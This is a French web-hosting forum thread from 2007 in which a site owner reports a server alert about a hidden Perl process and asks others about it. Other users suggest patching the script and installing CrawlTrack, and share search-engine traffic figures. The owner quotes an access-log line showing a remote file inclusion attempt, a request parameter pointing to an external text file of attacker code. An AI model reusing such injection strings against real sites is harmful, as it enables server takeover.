OVH Community, votre nouvel espace communautaire.

Tentative de hacking


Spinger
16/12/2007, 17h09
je pourrais pas te le dire, j'ai vidé les logs ce matin de crawtrack mais je l'avais vu passé mais vraiment rapido. Faut dire que vu le trafic que voila améne (comme Live c'est ridicule). On est encore tous dépendant de Google Stats Xiti sur des milliers de visiteurs uniques (c'est pas les stats urchin hein lol, qui compte les visiteurs même les robots)

"Google 89,5% "
"Live Search 3,7% "
"Yahoo 2,9% "
"AOL 1,1% "
"Free 1,0% "
"Orange 0,7% "
"Alice 0,6% "
"9online 0,2% "
"La Toile du Quebec 0,1% "
"MySearch 0,1% "

Abogil
16/12/2007, 17h03
Citation Envoyé par Spinger
On est étonné de voir les attaques (entre 1 à 5 chaque jour) surtout des russes, mais j'ai eu dernièrement une d'un serveur de grande société de restauration industriels vers un site d'un client de recettes, heureusement bloqué par crawltrack !
Pour le scan des sites, les Russes sont plus efficaces que les moteurs de recherche tels que Voila.fr.

Au fait, à quand remonte le dernier passage du bot de Voila.fr sur votre site ?

Levoyageur
16/12/2007, 16h25
Merci Spinger pour ton avis.
Ce qui m'étonne c'est que l'adresse attaquée n'est connue que de moi.
Pour le message, c'était postmaster@mondomaine.com

Spinger
16/12/2007, 15h57
Oui tout à fait c'est ça à coup sur, regarde bien ton script à l'url GET /xxxxxxx//xxxxx.xxx?xxxxx[xxx_xxx] si tu n'as pas une mise à jour à faire. Sinon installes Crawltrack et mets le code dans chacun de tes scripts de tes noms de domaines, il protège des attaques de ce genre ! De plus tu pourras suivre les indexations par les robots.

On est étonné de voir les attaques (entre 1 à 5 chaque jour) surtout des russes, mais j'ai eu dernièrement une d'un serveur de grande société de restauration industriels vers un site d'un client de recettes, heureusement bloqué par crawltrack !

Au fait, tu reçois cette alerte sur quel email ? ton mail de compte administratif ou bien postmaster@tondomaine.com

Levoyageur
16/12/2007, 12h42
Bonjour,
Je viens de recevoir un message du système de surveillance (Okillerd) qui a détecté une opération irrégulière au niveau de mon site.

Les détails de cette opération sont les suivants :
monsite.com
Problème rencontré : Hidden PERL script
Commande apparente : [kjournald]
Exécutable utilisé : /usr/bin/perl
Horodatage: Sun Dec 16 11:21:03 CET 2007

Après examen de mes logs vers l'heure indiquée je trouve la trace suivante:

sls-gb7p11.dca2.superb.net www.monsite.com - [16/Dec/2007:11:21:03 +0100] "GET /xxxxxxx//xxxxx.xxx?xxxxx[xxx_xxx]=h**p://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 500 607 "-" "libwww-perl/5.803"

Suis-je sur la bonne voie ?
Bien entendu j'ai mis des xxx pour l'adresse attaquée.

Merci pour vos réponse